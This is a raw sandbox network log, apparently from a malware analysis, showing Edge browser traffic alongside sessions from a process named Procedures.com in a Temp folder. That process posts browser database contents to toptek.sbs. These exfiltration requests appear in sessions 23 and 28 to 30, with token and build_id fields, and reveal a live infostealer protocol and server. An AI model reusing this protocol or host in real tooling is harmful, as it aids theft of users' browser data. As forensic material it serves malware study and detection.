                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomP#)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49938 | 162.159.61.3 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-23 05:24:29 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5fa1d43fa-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 03 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomA)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49948 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:29 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GV3W4E37YCBAAIW4ECJW
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 207993
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 56 33 57 34 45 33 37 59 43 42 41 41 49 57 34 45 43 4a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 56 33 57 34 45 33 37 59 43 42 41 41 49 57 34 45 43 4a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 56 33 57 34 45 33 37 59 43 42 41 41 49 57 34 45 43 4a 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------GV3W4E37YCBAAIW4ECJWContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------GV3W4E37YCBAAIW4ECJWContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------GV3W4E37YCBAAIW4ECJWCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                  Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:24:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49926 | 142.250.181.65 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:30 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-23 05:24:30 UTC | 570 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 154477
X-GUploader-UploadID: AFiumC6peKbeaD5AAOFIFpIY4iRMz0r723tdQqjZ-_sZLw4H2KJ7KzMpVkWBpbUuXqhVSHwrJ2iSn3M
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Sun, 22 Dec 2024 15:58:14 GMT
Expires: Mon, 22 Dec 2025 15:58:14 GMT
Cache-Control: public, max-age=31536000
Age: 48376
Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49950 | 162.159.61.3 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
2024-12-23 05:24:30 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecfc7eb27d06-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49951 | 172.64.41.3 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
2024-12-23 05:24:30 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecfcc9a441de-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49952 | 172.64.41.3 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
2024-12-23 05:24:31 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecfd39f741de-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49961 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:31 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----C2VKNG4E3W47YMGLXB1N
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 68733
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:24:31 UTC | 16355 | OUT | Data Ascii:
------C2VKNG4E3W47YMGLXB1N
Content-Disposition: form-data; name="token"

0e82b28cfc26d5aa50292f6553065302
------C2VKNG4E3W47YMGLXB1N
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------C2VKNG4E3W47YMGLXB1N
Cont
2024-12-23 05:24:33 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:24:33 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49973 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:34 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----UKNYC2VKNGV37Q9R9R9H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:24:34 UTC | 16355 | OUT | Data Ascii: ------UKNYC2VKNGV37Q9R9R9HContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------UKNYC2VKNGV37Q9R9R9HContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------UKNYC2VKNGV37Q9R9R9HCont
2024-12-23 05:24:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49978 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:35 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----L6XTRQ1VS0ZM7Q9HD26X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:24:35 UTC | 16355 | OUT | Data Ascii: ------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------L6XTRQ1VS0ZM7Q9HD26XCont
2024-12-23 05:24:37 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49944 | 18.165.220.110 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:35 UTC | 925 | OUT | GET /b?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-23 05:24:36 UTC | 955 | IN | HTTP/1.1 302 Found
Content-Length: 0
Connection: close
Date: Mon, 23 Dec 2024 05:24:36 GMT
Accept-CH: UA, Platform, Arch, Model, Mobile
Location: /b2?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
set-cookie: UID=19Abb18dd40861f844b83d11734931476; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
set-cookie: XID=19Abb18dd40861f844b83d11734931476; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
X-Cache: Miss from cloudfront
Via: 1.1 5008327c23740ce2f9d9ed54c8a489e8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: BAH53-P1
X-Amz-Cf-Id: uvhwVunuj2oo0YCJeez25CSirlcBbPzbqeWqPkv5IOlLLu5YkS7ErQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49994 | 20.42.73.24 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:37 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931474875&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 3869
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1
2024-12-23 05:24:37 UTC | 3869 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-23T05:24:34.871Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"locale
2024-12-23 05:24:38 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=c8e4d2d2ccd9454285f02bf017ed4ba4&HASH=c8e4&LV=202412&V=4&LU=1734931477888; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=cac78574556c43b9b90e6a86ee97d6fa; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 3013
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:37 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
